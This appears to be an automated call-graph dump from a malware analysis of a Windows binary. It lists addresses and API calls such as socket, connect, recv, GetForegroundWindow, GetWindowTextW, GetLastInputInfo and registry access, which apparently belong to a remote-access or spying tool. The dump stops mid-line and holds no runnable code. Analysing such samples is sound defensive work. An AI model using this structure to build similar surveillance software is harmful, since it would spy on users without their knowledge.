LeaveCriticalSection std::_Lockit::~_Lockit 53475->53477 53476->53466 53477->53466 53478->53473 53479 4458c8 53481 4458d3 53479->53481 53482 4458fc 53481->53482 53483 4458f8 53481->53483 53485 448b04 53481->53485 53492 445920 DeleteCriticalSection 53482->53492 53493 44854a 53485->53493 53488 448b49 InitializeCriticalSectionAndSpinCount 53489 448b34 53488->53489 53500 43502b 53489->53500 53491 448b60 53491->53481 53492->53483 53494 448576 53493->53494 53495 44857a 53493->53495 53494->53495 53497 44859a 53494->53497 53507 4485e6 53494->53507 53495->53488 53495->53489 53497->53495 53498 4485a6 GetProcAddress 53497->53498 53499 4485b6 __crt_fast_encode_pointer 53498->53499 53499->53495 53501 435036 IsProcessorFeaturePresent 53500->53501 53502 435034 53500->53502 53504 435078 53501->53504 53502->53491 53514 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53504->53514 53506 43515b 53506->53491 53508 448607 LoadLibraryExW 53507->53508 53513 4485fc 53507->53513 53509 448624 GetLastError 53508->53509 53510 44863c 53508->53510 53509->53510 53511 44862f LoadLibraryExW 53509->53511 53512 448653 FreeLibrary 53510->53512 53510->53513 53511->53510 53512->53513 53513->53494 53514->53506 53515 41e04e 53516 41e063 ctype ___scrt_get_show_window_mode 53515->53516 53517 41e266 53516->53517 53534 432f55 21 API calls new 53516->53534 53523 41e21a 53517->53523 53529 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 53517->53529 53520 41e277 53520->53523 53530 432f55 21 API calls new 53520->53530 53522 41e213 ___scrt_get_show_window_mode 53522->53523 53535 432f55 21 API calls new 53522->53535 53525 41e2b0 ___scrt_get_show_window_mode 53525->53523 53531 4335db 53525->53531 53527 41e240 ___scrt_get_show_window_mode 53527->53523 53536 432f55 21 API calls new 53527->53536 53529->53520 53530->53525 53537 4334fa 53531->53537 53533 4335e3 53533->53523 53534->53522 53535->53527 53536->53517 53538 433513 53537->53538 53541 433509 53537->53541 53538->53541 53543 432f55 21 API calls new 53538->53543 53540 433534 53540->53541 53544 4338c8 CryptAcquireContextA 53540->53544 53541->53533 53543->53540 53545 4338e9 CryptGenRandom 53544->53545 53547 4338e4 53544->53547 53546 4338fe CryptReleaseContext 53545->53546 53545->53547 53546->53547 53547->53541 53548 426c6d 53554 426d42 recv 53548->53554 53555 426a77 53556 426a8c 53555->53556 53568 426b1e 53555->53568 53557 426b83 53556->53557 53558 426bae 53556->53558 53561 426b0e 53556->53561 53565 426b4e 53556->53565 53567 426ad9 53556->53567 53556->53568 53569 426bd5 53556->53569 53583 424f6e 49 API calls ctype 53556->53583 53557->53558 53587 425781 21 API calls 53557->53587 53558->53568 53558->53569 53571 425b72 53558->53571 53561->53565 53561->53568 53585 424f6e 49 API calls ctype 53561->53585 53565->53557 53565->53568 53586 41fbfd 53 API calls 53565->53586 53567->53561 53567->53568 53584 41fbfd 53 API calls 53567->53584 53569->53568 53588 4261e6 29 API calls 53569->53588 53572 425b91 ___scrt_get_show_window_mode 53571->53572 53574 425ba0 53572->53574 53578 425bc5 53572->53578 53589 41ec4c 21 API calls 53572->53589 53574->53578 53582 425ba5 53574->53582 53590 420669 46 API calls 53574->53590 53577 425bae 53577->53578 53593 424d96 21 API calls 2 library calls 53577->53593 53578->53569 53580 425c48 53580->53578 53591 432f55 21 API calls new 53580->53591 53582->53577 53582->53578 53592 41daf0 49 API calls 53582->53592 53583->53567 53584->53567 53585->53565 53586->53565 53587->53558 53588->53568 53589->53574 53590->53580 53591->53582 53592->53577 53593->53578 53594 4165db 53605 401e65 53594->53605 53596 4165eb 53597 4020f6 28 API calls 53596->53597 53598 4165f6 53597->53598 53599 401e65 22 API calls 53598->53599 53600 416601 53599->53600 53601 4020f6 28 API calls 53600->53601 53602 41660c 53601->53602 53610 412965 53602->53610 53606 401e6d 53605->53606 53607 401e75 53606->53607 53629 402158 22 API calls 53606->53629 53607->53596 53630 40482d 53610->53630 53612 412979 53637 4048c8 connect 53612->53637 53616 41299a 53702 402f10 53616->53702 53619 404aa1 62 API calls 53620 4129ae 53619->53620 53621 401fd8 11 API calls 53620->53621 53622 4129b6 53621->53622 53707 404c10 53622->53707 53625 401fd8 11 API calls 53626 4129cc 53625->53626 53627 401fd8 11 API calls 53626->53627 53628 4129d4 53627->53628 53631 404846 socket 53630->53631 53632 404839 53630->53632 53633 404860 CreateEventW 53631->53633 53634 404842 53631->53634 53725 40489e WSAStartup 53632->53725 53633->53612 53634->53612 53636 40483e 53636->53631 53636->53634 53638 404a1b 53637->53638 53639 4048ee 53637->53639 53640 40497e 53638->53640 53641 404a21 WSAGetLastError 53638->53641 53639->53640 53642 404923 53639->53642 53726 40531e 53639->53726 53697 402f31 53640->53697 53641->53640 53643 404a31 53641->53643 53761 420cf1 27 API calls 53642->53761 53645 404932 53643->53645 53646 404a36 53643->53646 53651 402093 28 API calls 53645->53651 53766 41cb72 30 API calls 53646->53766 53648 40490f 53731 402093 53648->53731 53650 40492b 53650->53645 53654 404941 53650->53654 53655 404a80 53651->53655 53653 404a40 53767 4052fd 28 API calls 53653->53767 53661 404950 53654->53661 53662 404987 53654->53662 53658 402093 28 API calls 53655->53658 53663 404a8f 53658->53663 53665 402093 28 API calls 53661->53665 53763 421ad1 55 API calls 53662->53763 53666 41b580 80 API calls 53663->53666 53669 40495f 53665->53669 53666->53640 53672 402093 28 API calls 53669->53672 53670 40498f 53673 4049c4 53670->53673 53674 404994 53670->53674 53676 40496e 53672->53676 53765 420e97 28 API calls 53673->53765 53678 402093 28 API calls 53674->53678 53681 41b580 80 API calls 53676->53681 53680 4049a3 53678->53680 53683 402093 28 API calls 53680->53683 53684 404973 53681->53684 53682 4049cc 53685 4049f9 CreateEventW CreateEventW 53682->53685 53687 402093 28 API calls 53682->53687 53686 4049b2 53683->53686 53762 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53684->53762 53685->53640 53688 41b580 80 API calls 53686->53688 53690 4049e2 53687->53690 53691 4049b7 53688->53691 53692 402093 28 API calls 53690->53692 53764 421143 53 API calls 53691->53764 53694 4049f1 53692->53694 53695 41b580 80 API calls 53694->53695 53696 4049f6 53695->53696 53696->53685 53698 4020df 11 API calls 53697->53698 53699 402f3d 53698->53699 53700 4032a0 28 API calls 53699->53700 53701 402f59 53700->53701 53701->53616 53818 401fb0 53702->53818 53704 402f1e 53705 402055 11 API calls 53704->53705 53706 402f2d 53705->53706 53706->53619 53708 4020df 11 API calls 53707->53708 53709 404c27 53708->53709 53710 4020df 11 API calls 53709->53710 53717 404c30 53710->53717 53711 43bda0 new 21 API calls 53711->53717 53713 4020b7 28 API calls 53713->53717 53714 404ca1 53848 404e26 WaitForSingleObject 53714->53848 53717->53711 53717->53713 53717->53714 53718 401fd8 11 API calls 53717->53718 53821 404b96 53717->53821 53827 401fe2 53717->53827 53836 404cc3 53717->53836 53718->53717 53720 401fd8 11 API calls 53721 404cb1 53720->53721 53722 401fd8 11 API calls 53721->53722 53723 404cba 53722->53723 53723->53625 53725->53636 53727 4020df 11 API calls 53726->53727 53728 40532a 53727->53728 53768 4032a0 53728->53768 53730 405346 53730->53648 53732 40209b 53731->53732 53733 4023ce 11 API calls 53732->53733 53734 4020a6 53733->53734 53772 4024ed 53734->53772 53737 41b580 53738 41b631 53737->53738 53739 41b596 GetLocalTime 53737->53739 53740 401fd8 11 API calls 53738->53740 53741 40531e 28 API calls 53739->53741 53742 41b639 53740->53742 53743 41b5d8 53741->53743 53744 401fd8 11 API calls 53742->53744 53776 406383 53743->53776 53746 41b641 53744->53746 53746->53642 53748 402f10 28 API calls 53749 41b5f0 53748->53749 53750 406383 28 API calls 53749->53750 53751 41b5fc 53750->53751 53781 40723b 77 API calls 53751->53781 53753 41b60a 53754 401fd8 11 API calls 53753->53754 53755 41b616 53754->53755 53756 401fd8 11 API calls 53755->53756 53757 41b61f 53756->53757 53758 401fd8 11 API calls 53757->53758 53759 41b628 53758->53759 53760 401fd8 11 API calls 53759->53760 53760->53738 53761->53650 53762->53640 53763->53670 53764->53684 53765->53682 53766->53653 53770 4032aa 53768->53770 53769 4032c9 53769->53730 53770->53769 53771 4028e8 28 API calls 53770->53771 53771->53769 53773 4024f9 53772->53773 53774 40250a 28 API calls 53773->53774 53775 4020b1 53774->53775 53775->53737 53782 4051ef 53776->53782 53778 406391 53786 402055 53778->53786 53781->53753 53783 4051fb 53782->53783 53792 405274 53783->53792 53785 405208 53785->53778 53787 402061 53786->53787 53788 4023ce 11 API calls 53787->53788 53789 40207b 53788->53789 53814 40267a 53789->53814 53793 405282 53792->53793 53794 405288 53793->53794 53795 40529e 53793->53795 53803 4025f0 53794->53803 53797 4052f5 53795->53797 53798 4052b6 53795->53798 53812 4028a4 22 API calls 53797->53812 53801 4028e8 28 API calls 53798->53801 53802 40529c 53798->53802 53801->53802 53802->53785 53804 402888 22 API calls 53803->53804 53805 402602 53804->53805 53806 402672 53805->53806 53807 402629 53805->53807 53813 4028a4 22 API calls 53806->53813 53809 4028e8 28 API calls 53807->53809 53811 40263b 53807->53811 53809->53811 53811->53802 53815 40268b 53814->53815 53816 4023ce 11 API calls 53815->53816 53817 40208d 53816->53817 53817->53748 53819 4025f0 28 API calls 53818->53819 53820 401fbd 53819->53820 53820->53704 53822 404ba0 WaitForSingleObject 53821->53822 53823 404bcd recv 53821->53823 53861 421107 55 API calls 53822->53861 53825 404be0 53823->53825 53825->53717 53826 404bbc SetEvent 53826->53825 53828 401ff1 53827->53828 53829 402039 53827->53829 53830 4023ce 11 API calls 53828->53830 53829->53717 53831 401ffa 53830->53831 53832 40203c 53831->53832 53833 402015 53831->53833 53834 40267a 11 API calls 53832->53834 53862 403098 28 API calls 53833->53862 53834->53829 53837 4020df 11 API calls 53836->53837 53847 404cde 53837->53847 53838 404e13 53839 401fd8 11 API calls 53838->53839 53840 404e1c 53839->53840 53840->53717 53841 4041a2 28 API calls 53841->53847 53842 401fe2 28 API calls 53842->53847 53843 401fd8 11 API calls 53843->53847 53844 4020f6 28 API calls 53844->53847 53847->53838 53847->53841 53847->53842 53847->53843 53847->53844 53863 401fc0 53847->53863 53849 404e40 SetEvent CloseHandle 53848->53849 53850 404e57 closesocket 53848->53850 53851 404ca8 53849->53851 53852 404e64 53850->53852 53851->53720 53853 404e7a 53852->53853 54189 4050e4 84 API calls 53852->54189 53854 404e8c WaitForSingleObject 53853->53854 53855 404ece SetEvent CloseHandle 53853->53855 54190 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53854->54190 53855->53851 53858 404e9b SetEvent WaitForSingleObject 54191 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53858->54191 53860 404eb3 SetEvent CloseHandle CloseHandle 53860->53855 53861->53826 53862->53829 53864 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53863->53864 53865 401fc9 53863->53865 53864->53847 53868 415b25 53864->53868 53867 4025e0 28 API calls 53865->53867 53867->53864 53869 4020f6 28 API calls 53868->53869 53870 415b47 SetEvent 53869->53870 53871 415b5c 53870->53871 53947 4041a2 53871->53947 53874 4020f6 28 API calls 53875 415b86 53874->53875 53876 4020f6 28 API calls 53875->53876 53877 415b98 53876->53877 53950 41beac 53877->53950 53880 415bc1 GetTickCount 53972 41bc1f 53880->53972 53881 415d20 53944 415d11 53881->53944 53945 415d34 53881->53945 53882 401e8d 11 API calls 53884 4170cd 53882->53884 53887 401fd8 11 API calls 53884->53887 53889 4170d9 53887->53889 53891 401fd8 11 API calls 53889->53891 53890 415bde 53893 41bc1f 28 API calls 53890->53893 53892 4170e5 53891->53892 53894 415be9 53893->53894 53978 41bb27 53894->53978 53899 401e65 22 API calls 53900 415c13 53899->53900 53901 402f31 28 API calls 53900->53901 53902 415c21 53901->53902 53987 402ea1 28 API calls 53902->53987 53904 415c30 53905 402f10 28 API calls 53904->53905 53906 415c3f 53905->53906 53988 402ea1 28 API calls 53906->53988 53908 415c4e 53909 402f10 28 API calls 53908->53909 53910 415c5a 53909->53910 53989 402ea1 28 API calls 53910->53989 53912 415c64 53913 404aa1 62 API calls 53912->53913 53914 415c73 53913->53914 53915 401fd8 11 API calls 53914->53915 53916 415c7c 53915->53916 53917 401fd8 11 API calls 53916->53917 53918 415c88 53917->53918 53919 401fd8 11 API calls 53918->53919 53920 415c94 53919->53920 53921 401fd8 11 API calls 53920->53921 53922 415ca0 53921->53922 53923 401fd8 11 API calls 53922->53923 53924 415cac 53923->53924 53925 401fd8 11 API calls 53924->53925 53926 415cb8 53925->53926 53990 401f09 53926->53990 53929 401fd8 11 API calls 53930 415cca 53929->53930 53931 401fd8 11 API calls 53930->53931 53932 415cd3 53931->53932 53933 401e65 22 API calls 53932->53933 53934 415cde 53933->53934 53993 43bb2c 53934->53993 53937 415cf0 53940 415d09 53937->53940 53941 415cfe 53937->53941 53938 415d16 53939 401e65 22 API calls 53938->53939 53939->53881 53998 404f51 53940->53998 53997 404ff4 82 API calls 53941->53997 53944->53882 54013 4050e4 84 API calls 53945->54013 53946 415d04 53946->53944 54014 40423a 53947->54014 53951 4020df 11 API calls 53950->53951 53971 41bebf 53951->53971 53952 41bf2f 53953 401fd8 11 API calls 53952->53953 53954 41bf61 53953->53954 53955 401fd8 11 API calls 53954->53955 53958 41bf69 53955->53958 53956 41bf31 53959 4041a2 28 API calls 53956->53959 53957 4041a2 28 API calls 53957->53971 53960 401fd8 11 API calls 53958->53960 53961 41bf3d 53959->53961 53964 415ba1 53960->53964 53962 401fe2 28 API calls 53961->53962 53965 41bf46 53962->53965 53963 401fe2 28 API calls 53963->53971 53964->53880 53964->53881 53964->53944 53966 401fd8 11 API calls 53965->53966 53968 41bf4e 53966->53968 53967 401fd8 11 API calls 53967->53971 53969 41cec5 28 API calls 53968->53969 53969->53952 53971->53952 53971->53956 53971->53957 53971->53963 53971->53967 54020 41cec5 53971->54020 54056 441ed1 53972->54056 53975 402093 28 API calls 53976 415bd2 53975->53976 53977 41bb77 GetLastInputInfo GetTickCount 53976->53977 53977->53890 54065 436f10 53978->54065 53983 41bdaf 53984 41bdbc 53983->53984 53985 4020b7 28 API calls 53984->53985 53986 415c05 53985->53986 53986->53899 53987->53904 53988->53908 53989->53912 53991 402252 11 API calls 53990->53991 53992 401f12 53991->53992 53992->53929 53994 43bb45 _strftime 53993->53994 54114 43ae83 53994->54114 53996 415ceb 53996->53937 53996->53938 53997->53946 53999 404f65 53998->53999 54000 404fea 53998->54000 54001 404f6e 53999->54001 54002 404fc0 CreateEventA CreateThread 53999->54002 54003 404f7d GetLocalTime 53999->54003 54000->53944 54001->54002 54002->54000 54185 405150 54002->54185 54004 41bc1f 28 API calls 54003->54004 54005 404f91 54004->54005 54184 4052fd 28 API calls 54005->54184 54013->53946 54015 404243 54014->54015 54016 4023ce 11 API calls 54015->54016 54017 40424e 54016->54017 54018 402569 28 API calls 54017->54018 54019 4041b5 54018->54019 54019->53874 54021 41ced2 54020->54021 54022 41cf31 54021->54022 54026 41cee2 54021->54026 54023 41cf4b 54022->54023 54024 41d071 28 API calls 54022->54024 54040 41d1d7 28 API calls 54023->54040 54024->54023 54027 41cf1a 54026->54027 54031 41d071 54026->54031 54039 41d1d7 28 API calls 54027->54039 54030 41cf2d 54030->53971 54033 41d079 54031->54033 54032 41d0ab 54032->54027 54033->54032 54034 41d0af 54033->54034 54037 41d093 54033->54037 54051 402725 22 API calls 54034->54051 54041 41d0e2 54037->54041 54039->54030 54040->54030 54042 41d0ec __EH_prolog 54041->54042 54052 402717 22 API calls 54042->54052 54044 41d0ff 54053 41d1ee 11 API calls 54044->54053 54046 41d125 54047 41d15d 54046->54047 54054 402730 11 API calls 54046->54054 54047->54032 54049 41d144 54055 402712 11 API calls std::_Deallocate 54049->54055 54052->54044 54053->54046 54054->54049 54055->54047 54057 441edd 54056->54057 54060 441ccd 54057->54060 54059 41bc43 54059->53975 54061 441ce4 54060->54061 54063 441d1b _abort 54061->54063 54064 44062d 20 API calls _abort 54061->54064 54063->54059 54064->54063 54066 41bb46 GetForegroundWindow GetWindowTextW 54065->54066 54067 40417e 54066->54067 54068 404186 54067->54068 54073 402252 54068->54073 54070 404191 54077 4041bc 54070->54077 54074 40225c 54073->54074 54075 4022ac 54073->54075 54074->54075 54081 402779 11 API calls std::_Deallocate 54074->54081 54075->54070 54078 4041c8 54077->54078 54082 4041d9 54078->54082 54080 40419c 54080->53983 54081->54075 54083 4041e9 54082->54083 54084 404206 54083->54084 54085 4041ef 54083->54085 54099 4027e6 54084->54099 54089 404267 54085->54089 54088 404204 54088->54080 54090 402888 22 API calls 54089->54090 54091 40427b 54090->54091 54092 404290 54091->54092 54093 4042a5 54091->54093 54110 4042df 22 API calls 54092->54110 54094 4027e6 28 API calls 54093->54094 54098 4042a3 54094->54098 54096 404299 54111 402c48 22 API calls 54096->54111 54098->54088 54100 4027ef 54099->54100 54101 402851 54100->54101 54102 4027f9 54100->54102 54113 4028a4 22 API calls 54101->54113 54105 402802 54102->54105 54106 402815 54102->54106 54112 402aea 28 API calls __EH_prolog 54105->54112 54108 402813 54106->54108 54109 402252 11 API calls 54106->54109 54108->54088 54109->54108 54110->54096 54111->54098 54112->54108 54130 43ba8a 54114->54130 54116 43aed0 54136 43a837 54116->54136 54117 43ae95 54117->54116 54118 43aeaa 54117->54118 54129 43aeaf _abort 54117->54129 54135 44062d 20 API calls _abort 54118->54135 54122 43aedc 54123 43af0b 54122->54123 54144 43bacf 40 API calls __Tolower 54122->54144 54126 43af77 54123->54126 54145 43ba36 20 API calls 2 library calls 54123->54145 54146 43ba36 20 API calls 2 library calls 54126->54146 54127 43b03e _strftime 54127->54129 54147 44062d 20 API calls _abort 54127->54147 54129->53996 54131 43baa2 54130->54131 54132 43ba8f 54130->54132 54131->54117 54148 44062d 20 API calls _abort 54132->54148 54134 43ba94 _abort 54134->54117 54135->54129 54137 43a854 54136->54137 54138 43a84a 54136->54138 54137->54138 54149 448295 GetLastError 54137->54149 54138->54122 54140 43a875 54170 4483e4 36 API calls __Tolower 54140->54170 54142 43a88e 54171 448411 36 API calls __fassign 54142->54171 54144->54122 54145->54126 54146->54127 54147->54129 54148->54134 54150 4482b7 54149->54150 54151 4482ab 54149->54151 54173 445b74 20 API calls 3 library calls 54150->54173 54172 44883c 11 API calls 2 library calls 54151->54172 54154 4482b1 54154->54150 54156 448300 SetLastError 54154->54156 54155 4482c3 54157 4482cb 54155->54157 54180 448892 11 API calls 2 library calls 54155->54180 54156->54140 54174 446802 54157->54174 54159 4482e0 54159->54157 54162 4482e7 54159->54162 54161 4482d1 54163 44830c SetLastError 54161->54163 54181 448107 20 API calls _abort 54162->54181 54182 446175 36 API calls 4 library calls 54163->54182 54165 4482f2 54167 446802 _free 20 API calls 54165->54167 54169 4482f9 54167->54169 54168 448318 54169->54156 54169->54163 54170->54142 54171->54138 54172->54154 54173->54155 54175 44680d HeapFree 54174->54175 54176 446836 __dosmaperr 54174->54176 54175->54176 54177 446822 54175->54177 54176->54161 54183 44062d 20 API calls _abort 54177->54183 54179 446828 GetLastError 54179->54176 54180->54159 54181->54165 54182->54168 54183->54179 54188 40515c 102 API calls 54185->54188 54187 405159 54188->54187 54189->53853 54190->53858 54191->53860 54192 44839e 54200 448790 54192->54200 54195 4483b2 54197 4483ba 54198 4483c7 54197->54198 54208 4483ca 11 API calls 54197->54208 54201 44854a _abort 5 API calls 54200->54201 54202 4487b7 54201->54202 54203 4487cf TlsAlloc 54202->54203 54204 4487c0 54202->54204 54203->54204 54205 43502b CatchGuardHandler 5 API calls 54204->54205 54206 4483a8 54205->54206 54206->54195 54207 448319 20 API calls 3 library calls 54206->54207 54207->54197 54208->54195 54209 100020db 54212 100020e7 ___DestructExceptionObject 54209->54212 54210 100020f6 54211 10002110 dllmain_raw 54211->54210 54213 1000212a 54211->54213 54212->54210 54212->54211 54217 1000210b 54212->54217 54222 10001eec 54213->54222 54215 10002177 54215->54210 54216 10001eec 29 API calls 54215->54216 54218 1000218a 54216->54218 54217->54210 54217->54215 54219 10001eec 29 API calls 54217->54219 54218->54210 54220 10002193 dllmain_raw 54218->54220 54221 1000216d dllmain_raw 54219->54221 54220->54210 54221->54215 54223 10001ef7 54222->54223 54224 10001f2a dllmain_crt_process_detach 54222->54224 54225 10001f1c dllmain_crt_process_attach 54223->54225 54226 10001efc 54223->54226 54231 10001f06 54224->54231 54225->54231 54227 10001f01 54226->54227 54228 10001f12 54226->54228 54227->54231 54232 1000240b 25 API calls 54227->54232 54233 100023ec 27 API calls 54228->54233 54231->54217 54232->54231 54233->54231 54234 434918 54235 434924 ___scrt_is_nonwritable_in_current_image 54234->54235 54261 434627 54235->54261 54237 43492b 54239 434954 54237->54239 54567 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 54237->54567 54248 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 54239->54248 54272 4442d2 54239->54272 54243 434973 ___scrt_is_nonwritable_in_current_image 54244 4349f3 54280 434ba5 54244->54280 54248->54244 54568 443487 36 API calls 3 library calls 54248->54568 54262 434630 54261->54262 54573 434cb6 IsProcessorFeaturePresent 54262->54573 54264 43463c 54574 438fb1 54264->54574 54266 434641 54267 434645 54266->54267 54583 44415f 54266->54583 54267->54237 54270 43465c 54270->54237 54274 4442e9 54272->54274 54273 43502b CatchGuardHandler 5 API calls 54275 43496d 54273->54275 54274->54273 54275->54243 54276 444276 54275->54276 54277 4442a5 54276->54277 54278 43502b CatchGuardHandler 5 API calls 54277->54278 54279 4442ce 54278->54279 54279->54248 54281 436f10 ___scrt_get_show_window_mode 54280->54281 54282 434bb8 GetStartupInfoW 54281->54282 54283 4349f9 54282->54283 54284 444223 54283->54284 54633 44f0d9 54284->54633 54286 44422c 54288 434a02 54286->54288 54637 446895 36 API calls 54286->54637 54289 40ea00 54288->54289 54767 41cbe1 LoadLibraryA GetProcAddress 54289->54767 54291 40ea1c GetModuleFileNameW 54772 40f3fe 54291->54772 54293 40ea38 54294 4020f6 28 API calls 54293->54294 54295 40ea47 54294->54295 54296 4020f6 28 API calls 54295->54296 54297 40ea56 54296->54297 54298 41beac 28 API calls 54297->54298 54299 40ea5f 54298->54299 54787 40fb52 54299->54787 54301 40ea68 54302 401e8d 11 API calls 54301->54302 54303 40ea71 54302->54303 54304 40ea84 54303->54304 54305 40eace 54303->54305 54981 40fbee 118 API calls 54304->54981 54307 401e65 22 API calls 54305->54307 54309 40eade 54307->54309 54308 40ea96 54310 401e65 22 API calls 54308->54310 54312 401e65 22 API calls 54309->54312 54311 40eaa2 54310->54311 54982 410f72 36 API calls __EH_prolog 54311->54982 54313 40eafd 54312->54313 54314 40531e 28 API calls 54313->54314 54316 40eb0c 54314->54316 54318 406383 28 API calls 54316->54318 54317 40eab4 54983 40fb9f 78 API calls 54317->54983 54320 40eb18 54318->54320 54322 401fe2 28 API calls 54320->54322 54321 40eabd 54984 40f3eb 71 API calls 54321->54984 54324 40eb24 54322->54324 54325 401fd8 11 API calls 54324->54325 54326 40eb2d 54325->54326 54328 401fd8 11 API calls 54326->54328 54330 40eb36 54328->54330 54331 401e65 22 API calls 54330->54331 54332 40eb3f 54331->54332 54333 401fc0 28 API calls 54332->54333 54334 40eb4a 54333->54334 54335 401e65 22 API calls 54334->54335 54336 40eb63 54335->54336 54337 401e65 22 API calls 54336->54337 54338 40eb7e 54337->54338 54339 40ebe9 54338->54339 54985 406c59 54338->54985 54340 401e65 22 API calls 54339->54340 54346 40ebf6 54340->54346 54342 40ebab 54343 401fe2 28 API calls 54342->54343 54344 40ebb7 54343->54344 54345 401fd8 11 API calls 54344->54345 54348 40ebc0 54345->54348 54347 40ec3d 54346->54347 54352 413584 3 API calls 54346->54352 54791 40d0a4 54347->54791 54990 413584 RegOpenKeyExA 54348->54990 54358 40ec21 54352->54358 54356 40f38a 55083 4139e4 30 API calls 54356->55083 54358->54347 54993 4139e4 30 API calls 54358->54993 54366 40f3a0 55084 4124b0 65 API calls ___scrt_get_show_window_mode 54366->55084 54567->54237 54568->54244 54573->54264 54575 438fb6 ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 54574->54575 54587 43a4ba 54575->54587 54579 438fcc 54580 438fd7 54579->54580 54601 43a4f6 DeleteCriticalSection 54579->54601 54580->54266 54582 438fc4 54582->54266 54629 44fbe8 54583->54629 54586 438fda 8 API calls 3 library calls 54586->54267 54588 43a4c3 54587->54588 54590 43a4ec 54588->54590 54592 438fc0 54588->54592 54602 438eff 54588->54602 54607 43a4f6 DeleteCriticalSection 54590->54607 54592->54582 54593 43a46c 54592->54593 54622 438e14 54593->54622 54595 43a476 54596 43a481 54595->54596 54627 438ec2 6 API calls try_get_function 54595->54627 54596->54579 54598 43a48f 54599 43a49c 54598->54599 54628 43a49f 6 API calls ___vcrt_FlsFree 54598->54628 54599->54579 54601->54582 54608 438cf3 54602->54608 54605 438f36 InitializeCriticalSectionAndSpinCount 54606 438f22 54605->54606 54606->54588 54607->54592 54609 438d23 54608->54609 54610 438d27 54608->54610 54609->54610 54612 438d47 54609->54612 54615 438d93 54609->54615 54610->54605 54610->54606 54612->54610 54613 438d53 GetProcAddress 54612->54613 54614 438d63 __crt_fast_encode_pointer 54613->54614 54614->54610 54616 438dbb LoadLibraryExW 54615->54616 54621 438db0 54615->54621 54617 438dd7 GetLastError 54616->54617 54620 438def 54616->54620 54618 438de2 LoadLibraryExW 54617->54618 54617->54620 54618->54620 54619 438e06 FreeLibrary 54619->54621 54620->54619 54620->54621 54621->54609 54623 438cf3 try_get_function 5 API calls 54622->54623 54624 438e2e 54623->54624 54625 438e37 54624->54625 54626 438e46 TlsAlloc 54624->54626 54625->54595 54627->54598 54628->54596 54632 44fc01 54629->54632 54630 43502b CatchGuardHandler 5 API calls 54631 43464e 54630->54631 54631->54270 54631->54586 54632->54630 54634 44f0eb 54633->54634 54635 44f0e2 54633->54635 54634->54286 54638 44efd8 54635->54638 54637->54286 54639 448295 _abort 36 API calls 54638->54639 54640 44efe5 54639->54640 54658 44f0f7 54640->54658 54642 44efed 54667 44ed6c 54642->54667 54645 44f004 54645->54634 54648 44f047 54651 446802 _free 20 API calls 54648->54651 54651->54645 54652 44f042 54691 44062d 20 API calls _abort 54652->54691 54654 44f08b 54654->54648 54692 44ec42 20 API calls 54654->54692 54655 44f05f 54655->54654 54656 446802 _free 20 API calls 54655->54656 54656->54654 54659 44f103 ___scrt_is_nonwritable_in_current_image 54658->54659 54660 448295 _abort 36 API calls 54659->54660 54665 44f10d 54660->54665 54662 44f191 ___scrt_is_nonwritable_in_current_image 54662->54642 54665->54662 54666 446802 _free 20 API calls 54665->54666 54693 446175 36 API calls 4 library calls 54665->54693 54694 445909 EnterCriticalSection 54665->54694 54695 44f188 LeaveCriticalSection std::_Lockit::~_Lockit 54665->54695 54666->54665 54668 43a837 __fassign 36 API calls 54667->54668 54669 44ed7e 54668->54669 54670 44ed8d GetOEMCP 54669->54670 54671 44ed9f 54669->54671 54673 44edb6 54670->54673 54672 44eda4 GetACP 54671->54672 54671->54673 54672->54673 54673->54645 54674 4461b8 54673->54674 54675 4461f6 54674->54675 54676 4461c6 ___crtLCMapStringA 54674->54676 54697 44062d 20 API calls _abort 54675->54697 54676->54675 54677 4461e1 RtlAllocateHeap 54676->54677 54696 443001 7 API calls 2 library calls 54676->54696 54677->54676 54679 4461f4 54677->54679 54679->54648 54681 44f199 54679->54681 54682 44ed6c 38 API calls 54681->54682 54683 44f1b8 54682->54683 54686 44f209 IsValidCodePage 54683->54686 54688 44f1bf 54683->54688 54690 44f22e ___scrt_get_show_window_mode 54683->54690 54684 43502b CatchGuardHandler 5 API calls 54685 44f03a 54684->54685 54685->54652 54685->54655 54687 44f21b GetCPInfo 54686->54687 54686->54688 54687->54688 54687->54690 54688->54684 54698 44ee44 GetCPInfo 54690->54698 54691->54648 54692->54648 54693->54665 54694->54665 54695->54665 54696->54676 54697->54679 54699 44ef28 54698->54699 54700 44ee7e 54698->54700 54703 43502b CatchGuardHandler 5 API calls 54699->54703 54708 4511ac 54700->54708 54705 44efd4 54703->54705 54705->54688 54707 44aee6 _swprintf 41 API calls 54707->54699 54709 43a837 __fassign 36 API calls 54708->54709 54710 4511cc MultiByteToWideChar 54709->54710 54712 45120a 54710->54712 54719 4512a2 54710->54719 54714 45122b __alloca_probe_16 ___scrt_get_show_window_mode 54712->54714 54715 4461b8 ___crtLCMapStringA 21 API calls 54712->54715 54713 43502b CatchGuardHandler 5 API calls 54716 44eedf 54713->54716 54717 45129c 54714->54717 54720 451270 MultiByteToWideChar 54714->54720 54715->54714 54722 44aee6 54716->54722 54727 435ecd 20 API calls _free 54717->54727 54719->54713 54720->54717 54721 45128c GetStringTypeW 54720->54721 54721->54717 54723 43a837 __fassign 36 API calls 54722->54723 54724 44aef9 54723->54724 54728 44acc9 54724->54728 54727->54719 54729 44ace4 ___crtLCMapStringA 54728->54729 54730 44ad0a MultiByteToWideChar 54729->54730 54731 44ad34 54730->54731 54732 44aebe 54730->54732 54736 4461b8 ___crtLCMapStringA 21 API calls 54731->54736 54738 44ad55 __alloca_probe_16 54731->54738 54733 43502b CatchGuardHandler 5 API calls 54732->54733 54734 44aed1 54733->54734 54734->54707 54735 44ad9e MultiByteToWideChar 54737 44adb7 54735->54737 54750 44ae0a 54735->54750 54736->54738 54755 448c33 54737->54755 54738->54735 54738->54750 54742 44ade1 54746 448c33 _strftime 11 API calls 54742->54746 54742->54750 54743 44ae19 54744 4461b8 ___crtLCMapStringA 21 API calls 54743->54744 54749 44ae3a __alloca_probe_16 54743->54749 54744->54749 54745 44aeaf 54763 